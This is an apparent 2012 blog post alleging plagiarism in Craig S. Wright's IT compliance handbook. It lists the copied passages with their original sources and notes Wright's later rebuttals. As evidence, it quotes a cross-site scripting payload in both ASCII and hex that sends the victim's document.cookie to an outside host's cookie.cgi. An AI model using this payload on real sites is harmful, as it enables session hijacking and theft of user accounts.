Craig S. Wright - "The IT Regulatory and Standards Compliance Handbook" Contains Plagiarism

Sat Jan 7 19:25:05 CST 2012


[Update: Beginning on January 8, 2012, Craig Wright wrote an original rebuttal, a second follow-up a day after, and a third follow-up with additional information (We take some issue with the third, but will not get into it here). In it, he says that he did not properly cite some sources, but also gives additional details saying that some of the material was originally written by him, or as part of a group he was in. Mr. Wright indicates that some of this material, in its original form, is not available on Google, so we cannot verify it. It should be noted that Mr. Wright has spent a considerable amount of time researching each of the points outlined in this article, and determining what happened. This includes posting a sincere apology to the XSS FAQ author after mixing up who to obtain permission from. Many of the points Mr. Wright offers rebuttal to seem valid, that he was likely one of several contributors to work that eventually got used and re-used, and ultimately ended up in his book as well. We leave it up to the readers to determine the culpability of Mr. Wright in all of this.]



The book "The IT Regulatory and Standards Compliance Handbook: How to Survive an Information Systems Audit and Assessments" by Craig Steven Wright (published July 4, 2008), tech edited by Brian Freedman and Dale Liu, contains plagiarized material. While the quantity of stolen text does not comprise a majority of the book, there is enough to demonstrate systematic plagiarism, typically in the frequent bulleted lists throughout the book. The more interesting (and confusing) thing is that the author properly cites some sources, but not others. In fact, the level or lack of citation could lead one to think that three people contributed to the material. We know that Syngress has hired Technical Editors to provide content for books in the past (e.g., Dustin Fritz and "Dissecting the Hack 1st Edition"). This may be a case where the two technical editors provided material, a task that is not associated with the role of 'technical editor'.

As an example of the curious citations, page 7 has three external references: (Cohen, 1997), (Dijstra, 1976), and (Dodson, 2005). The last chapter of the book on Cyber Law not only has extensive footnotes, but they lead to 10 pages of footnotes citing sources. This is a drastically different method for citation and only appears in the single chapter. These three levels of citation (none, regular, footnotes) could easily be explained if the author and both technical editors contributed material.

The Plagiarism

The following table details the portions of the book that were taken from other sources, making up enough of the material to demonstrate the problem is systemic. In most cases, the plagiarized material is in the form of bulleted lists of points supporting the section. Most of the text spot-checked appeared to be original, with a couple exceptions. This suggests that the author(s) went through considerable effort to generate original content, but got lazy when providing supporting lists. In several cases, attempts were made to obscure the plagiarized content, one of which is included in the next paragraph. This shows willful infringement of copyright and inexcusable plagiarism. Only limited portions of the book were checked due to time constraints.

One of the most obvious places that demonstrate material was not only plagiarized, but the author attempted to hide the fact that the material was lifted, is in the section on cross-site scripting (XSS). On page 541, the second and third paragraph on XSS is almost verbatim from the well-known XSS FAQ. As you can see on the FAQ, the examples of cross-site scripting use "cgisecurity.com" as the domain name. When Wright took this material, he changed that domain to "microsoft.com". However, Wright changed the ASCII representation, but forgot to also change the HEX encoded version below it. This same mistake also appears on Wright's blog on XSS. From the book and blog:

NOTE: The request is first shown in ASCII, then in Hex for copy and paste purposes.

"><script>document.location='http://www.microsoft.com/cgi-bin/cookie.cgi?'+document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69
%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79
%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20
%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

If you take that HEX string and decode it, you get:

"><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

Wright even includes a link to the XSS FAQ shortly after in the additional "References" section, but does not indicate his material was lifted from it.

Pages / total Description Original Source
2 Paragraph 3, numbered bullets 1, 2a-c, 3, and 5 Verbatim from IT Security Cookbook by Sean Boran (1996-2003). Boran's material covered by Open Content License (OPL), but Wright's material does not adhere to license.
3-4 Job Roles and Responsibilities, and bulleted list 90% verbatim from section 3.3 of IT Security Cookbook by Sean Boran (1996-2003).
13 Definition of Internal Control, Key Concepts 90% verbatim from COSO
16 Ethics, and bullets 90% verbatim from Ethics in Quality by August B. Mundel (1991)
27 Terminology Used in This Book List suspiciously close to Chapter 5 / p245 of Sawyer's Internal Auditing : The Practice of Modern Internal Auditing by Lawrence B. Sawyer (2003). Some definitions verbatim, some very different.
37 Denial-of-Service Attacks, 1 sentence and 4 bullets Verbatim from CERT.org
46-47 Ethics bullets (Same as page 16)
50 BCP/DR Testing, first paragraph and 5 bullets
second paragraph, 5 bullets, and 3rd paragraph
Verbatim from Wikipedia
Verbatim from IBM
60-61 Planning the Audit, paragraph 2 and 7 bullets 95% verbatim from MHMRA of Harris County Internal Audit Mission Statement (2005)
95 Review Administrative Documentation, 6 bullets Half verbatim from Appendix 8A: Lan Audit Guide of Information Technology Audits by Xenia Ley Parker (June 15, 2007)
96 Network Maintenance, 5 bullets
Review system documentation, 12 bullets
Verbatim from Appendix 8A: Lan Audit Guide of Information Technology Audits by Xenia Ley Parker (June 15, 2007)
Near verbatim from Appendix 8A: Lan Audit Guide of Information Technology Audits, with slight edits like "graphics software" becoming "drawing software".
99 Review Remote Communications Controls, 11 of 20 bullets Near verbatim from Appendix 8A: Lan Audit Guide of Information Technology Audits by Xenia Ley Parker (June 15, 2007)
110 Rule-Based Authorization Checking, some text and 7 bullets Verbatim from IBM
110-111 Bell LaPdula, some text Verbatim from Protection: Bell-Lapadula Model by Harsh Manocha (2003 or earlier)
286-287 Identifying Vulnerabilities, classification of vulnerabilities Verbatim from Analysis of Vulnerabilities in Internet Firewalls by Kamara, Fahmy, Schultz, Kerschbaum, Frantzen
482-486 Text, and bullets (a majority of the material) Text is heavily based on but not exact, bullets are verbatim including precise order in many cases, from UNIX Unleashed: System Administrator's Edition by Burk & Horvath (1997)
541 Cross-Site Scripting, 2nd and 3rd paragraph, examples 85% verbatim from XSS FAQ
545 DNS Rebinding Attacks, two paragraphs Some text similar, some verbatim from DNS: Spoofing and Pinning (no date)
593-594 Vector Analysis, Goal 1 Verbatim from Intercept a network connection for a particular user (2007-12-19)